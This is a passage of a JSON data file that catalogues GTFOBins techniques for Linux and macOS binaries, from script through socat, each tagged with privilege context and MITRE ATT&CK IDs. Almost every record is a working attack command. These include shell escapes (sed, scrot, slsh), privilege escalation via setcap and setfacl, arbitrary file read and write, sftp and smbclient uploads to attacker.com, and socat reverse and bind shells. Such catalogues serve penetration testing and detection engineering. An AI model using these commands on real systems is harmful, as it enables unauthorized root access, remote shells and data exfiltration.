prints.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:file-write:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"script -q -c '# DATA' /path/to/output-file","description":"The content appears among the log prints.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:shell:0:sudo","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:shell:0:suid","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:script:shell:0:unprivileged","toolId":"gtfo:script","toolName":"script","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"script -q /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/script/"]},{"id":"gtfo:scrot:shell:0:sudo","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/scrot/"]},{"id":"gtfo:scrot:shell:0:suid","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/scrot/"]},{"id":"gtfo:scrot:shell:0:unprivileged","toolId":"gtfo:scrot","toolName":"scrot","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"scrot -e /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/scrot/"]},{"id":"gtfo:sed:file-read:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-read:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-read:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"sed '' /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-write:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-write:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:file-write:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"sed -n '1s/.*/DATA/w /path/to/output-file' /etc/hosts","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:0:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:0:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:0:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed -n '1e exec /bin/sh 1>&0' /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:1:sudo","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:1:suid","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:sed:shell:1:unprivileged","toolId":"gtfo:sed","toolName":"sed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sed e","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sed/"]},{"id":"gtfo:service:shell:0:sudo","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"service ../../bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/service/"]},{"id":"gtfo:service:shell:0:unprivileged","toolId":"gtfo:service","toolName":"service","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"service ../../bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/service/"]},{"id":"gtfo:setarch:shell:0:sudo","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setarch/"]},{"id":"gtfo:setarch:shell:0:suid","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setarch/"]},{"id":"gtfo:setarch:shell:0:unprivileged","toolId":"gtfo:setarch","toolName":"setarch","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setarch -3 /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setarch/"]},{"id":"gtfo:setcap:privilege-escalation:0:sudo","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setcap/"]},{"id":"gtfo:setcap:privilege-escalation:0:suid","toolId":"gtfo:setcap","toolName":"setcap","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setcap cap_setuid+ep /path/to/command","description":"This can be used to assign capabilities to executable files.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setcap/"]},{"id":"gtfo:setfacl:privilege-escalation:0:sudo","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setfacl/"]},{"id":"gtfo:setfacl:privilege-escalation:0:suid","toolId":"gtfo:setfacl","toolName":"setfacl","name":"privilege-escalation","source":"GTFOBins","platform":["Linux"],"capability":["Privilege Escalation"],"nativeCategory":["privilege-escalation"],"command":"setfacl -m u:$(id -un):rwx /path/to/input-file","description":"This can be run with elevated privileges to change ownership and then read, write, or execute a file.","mitre":["T1548"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setfacl/"]},{"id":"gtfo:setlock:shell:0:sudo","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/setlock/"]},{"id":"gtfo:setlock:shell:0:suid","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"setlock - /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/setlock/"]},{"id":"gtfo:setlock:shell:0:unprivileged","toolId":"gtfo:setlock","toolName":"setlock","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"setlock - /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/setlock/"]},{"id":"gtfo:sftp:download:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:download:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:download:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"sftp user@attacker.com\nget /path/to/input-file /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:shell:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:shell:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:shell:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sftp user@attacker.com\n!/bin/sh","description":"This still requires a successfull connection to the server.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:upload:0:sudo","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:upload:0:suid","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sftp:upload:0:unprivileged","toolId":"gtfo:sftp","toolName":"sftp","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"sftp user@attacker.com\nput /path/to/input-file /path/to/output-file","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sftp/"]},{"id":"gtfo:sg:shell:0:sudo","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"sg root","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/sg/"]},{"id":"gtfo:sg:shell:0:unprivileged","toolId":"gtfo:sg","toolName":"sg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"sg $(id -ng)","description":"Commands can be run if the current user's group is specified, therefore no additional permissions are needed.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/sg/"]},{"id":"gtfo:shred:file-write:0:sudo","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shred/"]},{"id":"gtfo:shred:file-write:0:suid","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shred/"]},{"id":"gtfo:shred:file-write:0:unprivileged","toolId":"gtfo:shred","toolName":"shred","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shred -u /path/to/output-file","description":"This actually deletes the chosen file.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shred/"]},{"id":"gtfo:shuf:file-read:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-read:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-read:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"shuf -z /path/to/input-file","description":"The read file content is corrupted by randomizing the order of NUL terminated strings.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-write:0:sudo","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-write:0:suid","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:shuf:file-write:0:unprivileged","toolId":"gtfo:shuf","toolName":"shuf","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"shuf -e DATA -o /path/to/output-file","description":"The written file content is corrupted by adding a newline.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/shuf/"]},{"id":"gtfo:slsh:shell:0:sudo","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/slsh/"]},{"id":"gtfo:slsh:shell:0:suid","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/slsh/"]},{"id":"gtfo:slsh:shell:0:unprivileged","toolId":"gtfo:slsh","toolName":"slsh","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"slsh -e 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/slsh/"]},{"id":"gtfo:smbclient:download:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:download:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"smbclient '\\\\attacker.com\\share' -c 'get /path/to/input-file /path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:shell:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:shell:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"smbclient '\\\\host\\share'\n!/bin/sh","description":"A valid SMB/CIFS server must be available.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:upload:0:sudo","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:smbclient:upload:0:unprivileged","toolId":"gtfo:smbclient","toolName":"smbclient","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"smbclient '\\\\attacker.com\\share' -c 'put /path/to/input-file /path/to/output-file'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/smbclient/"]},{"id":"gtfo:snap:command:0:sudo","toolId":"gtfo:snap","toolName":"snap","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"snap install xxxx_1.0_all.snap --dangerous --devmode","description":"Generate the Snap package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\nmkdir -p meta/hooks\necho -e '#!/bin/sh\\n/path/to/command; false' >meta/hooks/install\nchmod +x meta/hooks/install\nfpm -n xxxx -s dir -t snap -a all meta\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/snap/"]},{"id":"gtfo:socat:bind-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:bind-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:bind-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"bind-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["bind-shell"],"command":"socat tcp-listen:12345,reuseaddr,fork exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:download:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:download:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:download:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"socat -u tcp-connect:attacker.com:12345 open:/path/to/output-file,creat","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-read:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-read:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-read:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"socat -u file:/path/to/input-file -","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-write:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-write:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:file-write:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"socat -u 'exec:echo DATA' open:/path/to/output-file,creat","description":"The `echo` command is actually used.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:reverse-shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:reverse-shell:0:suid","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 'exec:/bin/sh -p,pty,stderr,setsid,sigint,sane'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:reverse-shell:0:unprivileged","toolId":"gtfo:socat","toolName":"socat","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/socat/"]},{"id":"gtfo:socat:shell:0:sudo","toolId":"gtfo:socat","toolName":"socat","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"socat - 